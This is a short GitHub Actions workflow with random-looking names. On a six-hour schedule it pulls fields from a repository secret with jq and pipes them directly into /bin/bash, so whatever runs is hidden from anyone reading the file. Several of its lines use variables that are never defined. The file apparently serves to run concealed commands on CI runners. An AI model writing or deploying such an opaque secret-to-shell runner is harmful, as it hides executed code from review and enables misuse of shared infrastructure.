name: liyuezi7163

on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liyuezi7163
        env:
          jgu6: ${{ secrets.jgu6 }}
        run: |
          echo $jgu6 | jq -r .vai332 | /bin/bash
          echo $ftuo994 | jq -r .kanmm72 | /bin/bash
          echo $nqang37328 | jq -r .uq8819 | /bin/bash
          echo $kf8 | jq -r .hqoa50385 | /bin/bash
          echo $xrs3054 | jq -r .plz5 | /bin/bash

